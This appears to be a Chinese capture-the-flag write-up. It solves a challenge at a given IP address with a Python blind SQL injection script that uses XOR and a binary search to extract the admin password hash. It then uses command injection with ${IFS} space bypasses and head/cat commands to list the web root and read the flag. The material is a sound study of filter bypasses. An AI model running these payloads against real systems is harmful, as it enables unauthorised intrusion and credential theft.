题目

1	http://218.76.35.74:20130/index.php

SQL注入

经过fuzz，一些关键字被过滤了：

or
for
union
空格
逗号，
*

一些关键字没有过滤：

select
from
where
substr
ascii
^
.

无回显，考察盲注。用异或^进行注入。

给出利用脚本：

# -*- coding:utf-8 -*-
import requests
import string
import sys
global findBit
def sendPayload(payload):
	proxy = {"http":"http://127.0.0.1:8080"}
	url = "http://218.76.35.74:20130/login.php"
	headers = {"Content-Type": "application/x-www-form-urlencoded"}
	parm = "uname="+payload+"&passwd=admin"
	content = requests.post(url,data=parm,headers=headers,proxies=proxy)
	return content.text
usernameerr = "username error!!"
def generateTarget(flag):
	if flag == "database":
		return "database()"
	elif flag == "passwd":
		return "(SELECT(passwd)from(admin))"
def doubleSearch(leftNum,rightNum,i,target):
	global findBit
	midNum = (leftNum + rightNum) / 2
	if (rightNum != leftNum +1):
		payload = "admin'^(select(ascii(mid(("+generateTarget(target) +")from("+ str(i) +"))))<="+str(midNum) +")='0"
		recv = sendPayload(payload)
		if usernameerr in recv:
			doubleSearch(midNum,rightNum,i,target)
		else:
			doubleSearch(leftNum,midNum,i,target)
	else:
		if rightNum != 0:
			sys.stdout.write(chr(rightNum))
			sys.stdout.flush()
		else:
			findBit = 1
			return
def exp():
	global findBit
	i = 1
	findBit = 0
	print "The passwd:"
	target = "passwd"
	while i :
		doubleSearch(-1,255,i,target)
		i += 1
		if findBit == 1:
			sys.stdout.write("\r\n")
			break
exp()

获得密码的Md5值为：50f87a3a3ad48e26a5d9058418fb78b5
解密后为： shuangshuang

命令执行

登陆后有一个命令执行的地方，但是过滤了空格，而且仅仅回显出结果的最后一条。
参考：浅谈CTF中命令执行与绕过的小技巧，空格可以利用${IFS}替代。
而回显可以利用head来选择。

输入

1	ls${IFS}/var/www/html\|head${IFS}-n${IFS}1

得到：

1	9ef89ad913e848b64b73e3aa721e44e4

输入

1	ls${IFS}/var/www/html/9ef89ad913e848b64b73e3aa721e44e4/

得到：

1	this_pag0_is_F1a9.php

输入：

1	cat${IFS}/var/www/html/9ef89ad913e848b64b73e3aa721e44e4/*

得到：

1	flag{sQ1_1NJEct_coMMond_eXEC}

或者直接访问:

1	http://218.76.35.74:20130/9ef89ad913e848b64b73e3aa721e44e4/this_pag0_is_F1a9.php